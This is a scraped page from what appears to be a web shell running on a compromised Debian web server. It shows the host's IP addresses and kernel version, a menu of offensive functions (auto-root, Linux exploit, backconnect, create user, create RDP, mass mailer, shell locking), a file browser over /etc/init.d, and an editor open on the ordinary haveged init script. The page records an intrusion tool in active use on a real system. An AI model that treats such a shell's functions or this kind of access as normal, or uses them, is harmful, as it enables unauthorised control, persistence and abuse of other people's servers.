Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apparmor
3.65
KB
-rwxr-xr-x
atd
1.05
KB
-rwxr-xr-x
bitnami
2.3
KB
-rwxr-xr-x
cloud-config
1.33
KB
-rwxr-xr-x
cloud-final
1.47
KB
-rwxr-xr-x
cloud-init
1.32
KB
-rwxr-xr-x
cloud-init-local
1.25
KB
-rwxr-xr-x
cron
2.99
KB
-rwxr-xr-x
dbus
3.08
KB
-rwxr-xr-x
haveged
2.31
KB
-rwxr-xr-x
hwclock.sh
1.71
KB
-rwxr-xr-x
kmod
2.01
KB
-rwxr-xr-x
procps
959
B
-rwxr-xr-x
screen-cleanup
1.19
KB
-rwxr-xr-x
ssh
3.96
KB
-rwxr-xr-x
sudo
1.13
KB
-rwxr-xr-x
udev
6.71
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
uuidd
1.28
KB
-rwxr-xr-x
x11-common
2.7
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : haveged
#! /bin/sh ### BEGIN INIT INFO # Provides: haveged # Required-Start: $remote_fs # Required-Stop: $remote_fs # Should-Start: $syslog # Should-Stop: $syslog # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: Entropy daemon using the HAVEGE algorithm # Description: haveged uses HAVEGE (HArdware Volatile Entropy Gathering # and Expansion) to maintain a pool of random bytes used # to fill /dev/random whenever necessary. ### END INIT INFO # Do NOT "set -e" PATH=/sbin:/usr/sbin:/bin:/usr/bin DESC="entropy daemon" NAME=haveged DAEMON=/usr/sbin/$NAME DAEMON_ARGS="" PIDFILE=/var/run/$NAME.pid SCRIPTNAME=/etc/init.d/$NAME # Exit if the package is not installed [ -x "$DAEMON" ] || exit 0 # Read configuration variable file if it is present [ -r /etc/default/$NAME ] && . /etc/default/$NAME # Load the VERBOSE setting and other rcS variables . /lib/init/vars.sh # Define LSB log_* functions. . /lib/lsb/init-functions do_start() { start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \ || return 1 start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON -- \ $DAEMON_ARGS \ || return 2 } do_stop() { start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE --name $NAME RETVAL="$?" [ "$RETVAL" = 2 ] && return 2 rm -f $PIDFILE return "$RETVAL" } case "$1" in start) [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME" do_start case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; stop) [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME" do_stop case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; status) status_of_proc "$DAEMON" "$NAME" && exit 0 || exit $? ;; restart|force-reload) log_daemon_msg "Restarting $DESC" "$NAME" do_stop case "$?" in 0|1) do_start case "$?" in 0) log_end_msg 0 ;; 1) log_end_msg 1 ;; # Old process is still running *) log_end_msg 1 ;; # Failed to start esac ;; *) # Failed to stop log_end_msg 1 ;; esac ;; *) echo "Usage: $SCRIPTNAME {start|stop|status|restart|force-reload}" >&2 exit 3 ;; esac :
Close